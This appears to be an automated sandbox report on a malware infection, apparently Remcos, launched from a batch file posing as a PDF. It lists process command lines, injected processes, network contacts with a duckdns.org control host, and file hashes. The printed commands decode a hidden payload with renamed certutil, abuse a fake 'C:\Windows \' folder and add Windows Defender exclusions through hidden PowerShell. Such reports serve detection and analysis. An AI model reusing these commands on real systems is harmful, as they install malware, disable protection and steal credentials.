Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Public\pha.pif N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd9796254832000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Public\pha.pif N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Public\pha.pif N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\SndVol.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A
N/A N/A C:\Windows\SysWOW64\SndVol.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5044 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 5044 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\extrac32.exe
PID 5044 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 1116 wrote to memory of 1012 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 1116 wrote to memory of 1012 N/A C:\Users\Public\alpha.exe C:\Windows\system32\extrac32.exe
PID 5044 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 4876 wrote to memory of 5032 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 4876 wrote to memory of 5032 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 5044 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 3676 wrote to memory of 1668 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 3676 wrote to memory of 1668 N/A C:\Users\Public\alpha.exe C:\Users\Public\kn.exe
PID 5044 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\AHA.COM
PID 5044 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\AHA.COM
PID 5044 wrote to memory of 2364 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Libraries\AHA.COM
PID 5044 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 5044 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Users\Public\alpha.exe
PID 2364 wrote to memory of 4684 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\cmd.exe
PID 2364 wrote to memory of 4684 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\cmd.exe
PID 2364 wrote to memory of 4684 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\cmd.exe
PID 4684 wrote to memory of 1984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 1964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\esentutl.exe
PID 4684 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 3128 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 4440 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4440 wrote to memory of 3956 N/A C:\Users\Public\alpha.pif C:\Users\Public\xpha.pif
PID 4440 wrote to memory of 3956 N/A C:\Users\Public\alpha.pif C:\Users\Public\xpha.pif
PID 4440 wrote to memory of 3956 N/A C:\Users\Public\alpha.pif C:\Users\Public\xpha.pif
PID 4684 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \SysWOW64\per.exe
PID 4684 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows \SysWOW64\per.exe
PID 1672 wrote to memory of 3624 N/A C:\Windows \SysWOW64\per.exe C:\Windows\SYSTEM32\esentutl.exe
PID 1672 wrote to memory of 3624 N/A C:\Windows \SysWOW64\per.exe C:\Windows\SYSTEM32\esentutl.exe
PID 1672 wrote to memory of 2236 N/A C:\Windows \SysWOW64\per.exe C:\Users\Public\pha.pif
PID 1672 wrote to memory of 2236 N/A C:\Windows \SysWOW64\per.exe C:\Users\Public\pha.pif
PID 4684 wrote to memory of 232 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 232 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 232 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1844 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1844 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 1844 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 5056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 5056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 4684 wrote to memory of 5056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Public\alpha.pif
PID 2364 wrote to memory of 744 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\esentutl.exe
PID 2364 wrote to memory of 744 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\esentutl.exe
PID 2364 wrote to memory of 744 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\esentutl.exe
PID 2364 wrote to memory of 1660 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\SndVol.exe
PID 2364 wrote to memory of 1660 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\SndVol.exe
PID 2364 wrote to memory of 1660 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\SndVol.exe
PID 2364 wrote to memory of 1660 N/A C:\Users\Public\Libraries\AHA.COM C:\Windows\SysWOW64\SndVol.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat"

C:\Windows\System32\extrac32.exe

C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Windows\system32\extrac32.exe

extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PAYMENT TRANSFER ERROR.PDF.bat" "C:\\Users\\Public\\AHA.GIF" 3

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10

C:\Users\Public\kn.exe

C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AHA.GIF" "C:\\Users\\Public\\Libraries\\AHA.COM" 10

C:\Users\Public\Libraries\AHA.COM

C:\Users\Public\Libraries\AHA.COM

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S

C:\Users\Public\alpha.exe

C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AHA.GIF" / A / F / Q / S

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\jkzjblcW.cmd" "

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

C:\Users\Public\xpha.pif

C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10

C:\Windows \SysWOW64\per.exe

"C:\\Windows \\SysWOW64\\per.exe

C:\Windows\SYSTEM32\esentutl.exe

esentutl /y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe /d C:\\Users\\Public\\pha.pif /o

C:\Users\Public\pha.pif

C:\\Users\\Public\\pha.pif -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension '.exe','bat','.pif'

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64

C:\Users\Public\alpha.pif

C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"

C:\Windows\SysWOW64\esentutl.exe

C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AHA.COM /d C:\\Users\\Public\\Libraries\\Wclbjzkj.PIF /o

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\System32\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\emiy"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\emiy"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\emiy"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ppnitxd"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\ppnitxd"

C:\Windows\SysWOW64\SndVol.exe

C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rjtbupnzxe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 2007.filemail.com udp
DE 50.7.84.74:443 2007.filemail.com tcp
DE 50.7.84.74:443 2007.filemail.com tcp
US 8.8.8.8:53 74.84.7.50.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
N/A 127.0.0.1:59089 tcp
US 8.8.8.8:53 legacyrem.duckdns.org udp
MY 103.186.116.130:59089 legacyrem.duckdns.org tcp
US 8.8.8.8:53 130.116.186.103.in-addr.arpa udp
MY 103.186.116.130:59089 legacyrem.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp

Files

C:\Users\Public\alpha.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Users\Public\kn.exe

MD5 bd8d9943a9b1def98eb83e0fa48796c2
SHA1 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

C:\Users\Public\AHA.GIF

MD5 2ddfa3ebd56847d40e59f092be0e6568
SHA1 3e56b1a986cd5600bc8dd134f1ff2ce5dbd53827
SHA256 11693a473afe426024135c37b1013491c2e98d89e6c9da6edfcc0a8c28bf1d02
SHA512 92816361505672a82452ed2036120a3d45e6abfa52577db819ba56318109da5242428bdf521751d6832976bc63831ddbaf0c10ad6563d26ed7b177f276421652

C:\Users\Public\Libraries\AHA.COM

MD5 d70fa5471771d18888f0861ac060a914
SHA1 83ef28ef9e4850629433f497fd0360120449e297
SHA256 31a7e70deb8af07d7b76b5dea8cbf90ec63bea24bffdd5ebac6f223c02f55753
SHA512 af89922e5a24a12522603e4a034b2e1aef911d5cf6399de426aa95b971dcf70513a99f45033895939f0475d7b001054717c9b0d38278ff45ee2b41376f3da31b

memory/2364-28-0x0000000002920000-0x0000000003920000-memory.dmp

memory/2364-29-0x0000000002920000-0x0000000003920000-memory.dmp

memory/2364-31-0x0000000000400000-0x0000000000540000-memory.dmp

C:\Users\Public\Libraries\jkzjblcW.cmd

MD5 b87f096cbc25570329e2bb59fee57580
SHA1 d281d1bf37b4fb46f90973afc65eece3908532b2
SHA256 d08ccc9b1e3acc205fe754bad8416964e9711815e9ceed5e6af73d8e9035ec9e
SHA512 72901adde38f50cf6d74743c0a546c0fea8b1cd4a18449048a0758a7593a176fc33aad1ebfd955775eefc2b30532bcc18e4f2964b3731b668dd87d94405951f7

memory/1984-38-0x0000000000970000-0x0000000000980000-memory.dmp

memory/1984-61-0x0000000000D10000-0x0000000000D20000-memory.dmp

C:\Users\Public\alpha.pif

MD5 d0fce3afa6aa1d58ce9fa336cc2b675b
SHA1 4048488de6ba4bfef9edf103755519f1f762668f
SHA256 4d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22
SHA512 80e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2

C:\Users\Public\xpha.pif

MD5 b3624dd758ccecf93a1226cef252ca12
SHA1 fcf4dad8c4ad101504b1bf47cbbddbac36b558a7
SHA256 4aaa74f294c15aeb37ada8185d0dead58bd87276a01a814abc0c4b40545bf2ef
SHA512 c613d18511b00fa25fc7b1bdde10d96debb42a99b5aaab9e9826538d0e229085bb371f0197f6b1086c4f9c605f01e71287ffc5442f701a95d67c232a5f031838

C:\Windows \SysWOW64\per.exe

MD5 869640d0a3f838694ab4dfea9e2f544d
SHA1 bdc42b280446ba53624ff23f314aadb861566832
SHA256 0db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA512 6e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7

C:\Windows \SysWOW64\NETUTILS.dll

MD5 c5db31551cb21105e3f0b3e467b91cc7
SHA1 c66fd7732973d9803ba0fd4323e8507876892310
SHA256 3fa23d8f7b7eeac6443e107bd70d0c6371afc1f8082d3d58fffd8685cf9e2193
SHA512 6d1ee4b55fb74dc093f52caf1e093ec2742af263ff8fa264cd61eea48c021c3438150ba12a8e9d694e7246fe296ea011d8b6313e8ee4476a63c7072c2990685e

C:\Users\Public\pha.pif

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/2236-153-0x0000028AC5AC0000-0x0000028AC5AE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kxe1h5lt.okm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\emiy

MD5 faaa2b16df1bfc1a3792faaa35786349
SHA1 359534a59d7c5139ae205c24533ba60afdfb9f3f
SHA256 3586befc3b8b4da223e2ee0dcb00965ba5c0a205c14f2acefdeec7e46efddd5a
SHA512 2fbc79cace52a58e69ab983d034bb41ebb2496f767e18e5e4b31eefc4447c935d8614f744c71302e459350a05562fadc4c2355d76638b595e7cff1bb3d1618db

C:\ProgramData\remcos\logs.dat

MD5 e8ac82413558862717d0c2c86eb86ef1
SHA1 0dfb235814745e6cd6c3ead4fe2f4a4278086ec0
SHA256 0717378fe2be81cfb2641e32892fb02d41fb93945aae9f4df90f48e2d9005675
SHA512 fc3916fb21c72f397bac4c02d96ef67b67f75471bd2c9e62f7fc98803dc50199ea55fecb54435577e819d4abe8a4acfb6faa1c7774b2f5ad629909bcfb79cb2e